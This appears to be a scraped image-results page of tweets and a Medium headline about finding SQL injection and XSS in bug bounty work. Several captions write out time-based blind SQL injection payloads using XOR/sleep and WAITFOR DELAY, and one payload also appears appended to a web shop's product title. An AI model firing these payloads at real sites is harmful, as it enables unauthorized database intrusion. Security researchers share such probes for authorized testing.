![Lu3ky13 on Twitter: "how I found XSS AND SQL INJECTION 1 I found text.php 2 I used Arjun to find parameters 3 text.Php?m=1'xss and SQL done, I submitted to h1 #bugbounty #hackerone # Lu3ky13 on Twitter: "how I found XSS AND SQL INJECTION 1 I found text.php 2 I used Arjun to find parameters 3 text.Php?m=1'xss and SQL done, I submitted to h1 #bugbounty #hackerone #](https://pbs.twimg.com/media/FYJsIRkWIAAl2dl.png)
Lu3ky13 on Twitter: "how I found XSS AND SQL INJECTION 1 I found text.php 2 I used Arjun to find parameters 3 text.Php?m=1'xss and SQL done, I submitted to h1 #bugbounty #hackerone #
![N$ 🍥 on Twitter: "Blind #SQLInjection on #GraphQL The API accepts queries for user "gender" data and accepts 3 keywords "M,F,NA", I found the parader "xxxkeyword_xx_xx" is vulnerable to blind-SQL injection attacks N$ 🍥 on Twitter: "Blind #SQLInjection on #GraphQL The API accepts queries for user "gender" data and accepts 3 keywords "M,F,NA", I found the parader "xxxkeyword_xx_xx" is vulnerable to blind-SQL injection attacks](https://pbs.twimg.com/media/Fe0dxb4WIA4cYdw.png)
N$ 🍥 on Twitter: "Blind #SQLInjection on #GraphQL The API accepts queries for user "gender" data and accepts 3 keywords "M,F,NA", I found the parader "xxxkeyword_xx_xx" is vulnerable to blind-SQL injection attacks
![Jawad 🇧🇩 ar Twitter: "Detect Blind SQL INJECTION with these payloads 0"XOR (if(now()=sysdate(),sleep(12),0))XOR"Z%20=%3E 0'XOR(if(now()=sysdate(),sleep (3),0))XOR'Z '%20WAITFOR%20DELAY%20'0:0:5'-- if(now()=sysdate(),sleep(3),0) https://t.co/IRTpuUNlUh ... Jawad 🇧🇩 ar Twitter: "Detect Blind SQL INJECTION with these payloads 0"XOR (if(now()=sysdate(),sleep(12),0))XOR"Z%20=%3E 0'XOR(if(now()=sysdate(),sleep (3),0))XOR'Z '%20WAITFOR%20DELAY%20'0:0:5'-- if(now()=sysdate(),sleep(3),0) https://t.co/IRTpuUNlUh ...](https://pbs.twimg.com/media/EwTKDtIUcAA67nC.png:large)
Jawad 🇧🇩 ar Twitter: "Detect Blind SQL INJECTION with these payloads 0"XOR (if(now()=sysdate(),sleep(12),0))XOR"Z%20=%3E 0'XOR(if(now()=sysdate(),sleep (3),0))XOR'Z '%20WAITFOR%20DELAY%20'0:0:5'-- if(now()=sysdate(),sleep(3),0) https://t.co/IRTpuUNlUh ...
![How I Found Sql Injection on 8x8 , Cengage,Comodo,Automattic,20 company | by Ahmad A Abdulla | Medium How I Found Sql Injection on 8x8 , Cengage,Comodo,Automattic,20 company | by Ahmad A Abdulla | Medium](https://miro.medium.com/v2/resize:fit:1200/1*LEI1rSC2-hgdGq8yKZr3jA.png)
How I Found Sql Injection on 8x8 , Cengage,Comodo,Automattic,20 company | by Ahmad A Abdulla | Medium
![N$ 🍥 on Twitter: "I was testing an app's #oauth2 today and randomly inject the payload "0'XOR(if(now()=sysdate(),sleep(6-2),0))XOR'Z", with php extension, and booom it was blind #SQLinjection...wt**, never knew SQLi payloads can be N$ 🍥 on Twitter: "I was testing an app's #oauth2 today and randomly inject the payload "0'XOR(if(now()=sysdate(),sleep(6-2),0))XOR'Z", with php extension, and booom it was blind #SQLinjection...wt**, never knew SQLi payloads can be](https://pbs.twimg.com/media/FrmdTFMWYAgmfd0.png)
N$ 🍥 on Twitter: "I was testing an app's #oauth2 today and randomly inject the payload "0'XOR(if(now()=sysdate(),sleep(6-2),0))XOR'Z", with php extension, and booom it was blind #SQLinjection...wt**, never knew SQLi payloads can be
![HiViLux | HiViLux HDMI OFC-cable V1,4a metal - 0"XOR (if(now()=sysdate(),sleep(12),0))XOR"Z | now online order HiViLux | HiViLux HDMI OFC-cable V1,4a metal - 0"XOR (if(now()=sysdate(),sleep(12),0))XOR"Z | now online order](https://www.hivilux.de/out/pictures/generated/product/1/540_340_90/hdmi_b_2.jpg)